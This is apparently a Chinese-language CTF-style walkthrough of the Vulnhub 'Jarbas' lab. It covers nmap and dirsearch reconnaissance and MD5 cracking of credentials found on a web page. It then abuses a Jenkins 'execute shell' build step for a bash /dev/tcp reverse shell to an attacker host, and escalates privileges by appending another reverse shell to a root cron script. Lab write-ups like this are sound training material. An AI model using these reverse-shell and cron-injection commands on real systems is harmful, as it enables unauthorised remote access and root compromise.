【Vulnhub靶机】Jarbas--Jenkins

文章目录

    • 信息收集
      • 主机发现
      • 端口扫描
      • 目录爆破
    • 漏洞探测
      • whatweb
      • hash-identifier
      • whatweb

文档说明:https://www.vulnhub.com/entry/jarbas-1,232/

靶机下载:Download (Mirror):

信息收集

主机发现

扫描C段

sudo nmap -sn 10.9.75.0/24

【Vulnhub靶机】Jarbas--Jenkins_第1张图片

端口扫描

sudo nmap --min-rate 10000 10.9.75.10

【Vulnhub靶机】Jarbas--Jenkins_第2张图片

详细扫描服务版本,系统

sudo nmap -sT -sV -O -p 22,80,3306,8080 10.9.75.10 

【Vulnhub靶机】Jarbas--Jenkins_第3张图片

目录爆破

dirsearch -u http://10.9.75.10 -i 200  

【Vulnhub靶机】Jarbas--Jenkins_第4张图片

漏洞探测

whatweb

访问80端口

【Vulnhub靶机】Jarbas--Jenkins_第5张图片

whatweb http://10.9.75.10

image-20231125133245051

并没有识别到类似的CMS内容管理系统,

继续访问access.html发现了类似用户名:加密后的密码的东西

【Vulnhub靶机】Jarbas--Jenkins_第6张图片

hash-identifier

可以使用工具来验证加密类型

hash-identifier "5978a63b4654c73c60fa24f836386d87"  

【Vulnhub靶机】Jarbas--Jenkins_第7张图片

拿去在线网站进行md5解密

【Vulnhub靶机】Jarbas--Jenkins_第8张图片

【Vulnhub靶机】Jarbas--Jenkins_第9张图片

【Vulnhub靶机】Jarbas--Jenkins_第10张图片

tiago:italia99

trindade:marianna

eder:vipsu

访问8080端口

【Vulnhub靶机】Jarbas--Jenkins_第11张图片

whatweb

whatweb http://10.9.75.10:8080

image-20231125134830353

指纹识别出一个Jenkins的CMS管理系统

尝试使用上面解密出来的密码进行登陆

使用eder:vipsu登陆成功!

【Vulnhub靶机】Jarbas--Jenkins_第12张图片

【Vulnhub靶机】Jarbas--Jenkins_第13张图片

新建一个任务

【Vulnhub靶机】Jarbas--Jenkins_第14张图片

选择第一个自由风格软件项目就可以,然后往下翻,点击确定

点击Build构建

【Vulnhub靶机】Jarbas--Jenkins_第15张图片

由于目标系统是linux系统,所以选择第二个execute shell

/bin/bash >& /dev/tcp/10.9.75.3/6868 0>&1

#反弹到kali上

点击应用,然后点击保存

【Vulnhub靶机】Jarbas--Jenkins_第16张图片

这个时候kali先监听6868端口

nc  -lvvp 6868  

回到页面上点击立即构建

【Vulnhub靶机】Jarbas--Jenkins_第17张图片

就反弹到kali机器上了

【Vulnhub靶机】Jarbas--Jenkins_第18张图片

页面上会显示有一个任务正在运行

【Vulnhub靶机】Jarbas--Jenkins_第19张图片

我们拿到shell是没有回显的,可以通过python获取显示shell

python -c "import pty;pty.spawn('/bin/bash')"

【Vulnhub靶机】Jarbas--Jenkins_第20张图片

最后再计划任务里找到了以root运行 的程序

【Vulnhub靶机】Jarbas--Jenkins_第21张图片

查看文件内容

cat /etc/script/CleaningScript.sh

【Vulnhub靶机】Jarbas--Jenkins_第22张图片

可以在里面添加反弹shell,

echo "/bin/bash >& /dev/tcp/10.9.75.3/6869 0>&1" >> /etc/script/CleaningScript.sh

【Vulnhub靶机】Jarbas--Jenkins_第23张图片

kali监听6869端口,等待反弹

【Vulnhub靶机】Jarbas--Jenkins_第24张图片

Jenkins 的漏洞利用方式有很多,可以自行去网上查阅相关资料

你可能感兴趣的:(#,靶机系列,jenkins,靶机)